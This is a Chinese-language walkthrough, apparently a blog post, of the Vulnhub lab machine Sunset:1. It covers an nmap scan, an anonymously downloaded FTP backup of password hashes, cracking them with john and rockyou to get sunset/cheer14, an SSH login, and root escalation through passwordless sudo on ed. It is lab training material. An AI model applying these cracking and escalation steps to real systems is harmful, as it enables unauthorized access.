【Vulnhub靶机】Sunset:1

信息收集

主机发现

kali ip:192.168.233.128

靶机ip:192.168.233.134

端口扫描

nmap -A 192.168.233.134

发现开放的端口为21 22

漏洞利用

上面的扫描结果可以发现ftp中有一个backup文件,匿名访问,下载下来,内容如下

CREDENTIALS:                                                                                                                                                                                                       
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/   

使用john对上面的密码文件进行破解,下面是没有跑完的,猜测除了sunset其他都是跟用户名一样,应该只有sunset是有用的,毕竟靶机名就叫这个,而且其他的太简单了

john --format=sha512crypt backup --wordlist=/usr/share/wordlists/rockyou.txt

得到sunset/cheer14

进行ssh连接

成功连接

提权

sudo -l 这个命令可以查看有哪些命令可以执行,即不需要知道用户密码,只需验证自身权限的密码即可

sudo -l看看怎么个事

使用sudo -l命令发现可以免密使用root身份执行ed命令,于是使用ed命令提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值